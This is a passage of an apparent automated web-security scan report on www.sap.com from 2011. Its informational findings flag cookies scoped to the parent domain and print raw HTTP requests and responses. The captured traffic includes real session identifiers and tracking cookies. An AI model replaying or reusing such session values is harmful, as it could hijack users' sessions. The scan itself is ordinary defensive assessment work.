Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS

{"method":"TrackInteraction","arguments":["https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1","http://store.businessobj
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:19 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:19 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:19 GMT

11.59. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:09 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:09 GMT; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; domain=.sap.com; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; domain=.sap.com; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:10 GMT
Content-Length: 149165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="
...[SNIP]...
11.60. https://www.sap.com/contactsap/contact_warning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/contact_warning.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactsap/contact_warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3471
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:31 GMT
Connection: close


<html>
   <head>
       <title>SAP - Contact SAP Warning</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" cont
...[SNIP]...
11.61. https://www.sap.com/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactsap/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 126
Content-Type: text/html; charset=utf-8
Location: /host.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:01 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:04:01 GMT; path=/
Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fcontactsap%2findex.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/host.epx">here</a>.</h2>
</body></html>
11.62. https://www.sap.com/host.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /host.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /host.epx?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-US10-SGE-FRBUSOPT; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; OriginatingURL=http://www.sapbusinessoptimizer.com/; SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; pmeoriginalurl=%2fhost.epx; pmereturnurl=%2fgwtservice.epx; pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue; pmedialogmode=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:16 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:16 GMT; path=/
Set-Cookie: pmelayerurl=; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:15 GMT
Content-Length: 32896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.63. https://www.sap.com/omni.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /omni.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /omni.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="CAO PSA OUR"
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:31 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:31 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:31 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:32 GMT
Content-Length: 86

var omni_value = '50271dcd-9baa-4ef3-893c-9fb47c6b6fd7';
var omni_ttc = '1318688493';
11.64. https://www.sap.com/profile/captcha.epimg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/captcha.epimg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/captcha.epimg?eqs=80FDF91121181B29096FDBF8C13490FC3D78E210BA998B1C50C73CC97CDD1CB5 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4605
Content-Type: image/jpeg
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:15 GMT

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<...."..............................
...[SNIP]...
11.65. https://www.sap.com/profile/login.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/login.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/login.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 126
Content-Type: text/html; charset=utf-8
Location: /host.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:40 GMT; path=/
Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fprofile%2flogin.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:39 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/host.epx">here</a>.</h2>
</body></html>
11.66. https://www.sap.com/profile/slogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/slogin.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:44 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:44 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:43 GMT
Content-Length: 12160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
11.67. https://www.sap.com/profile/warning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/warning.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5057
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:52 GMT
Connection: close


<html>
   <head>
       <title>SAP - PLEASE REVIEW YOUR REGISTRATION.</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-L
...[SNIP]...
11.68. https://www.sap.com/sme/contactsap/FormCodesRemote.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/FormCodesRemote.epi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /sme/contactsap/FormCodesRemote.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 86
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
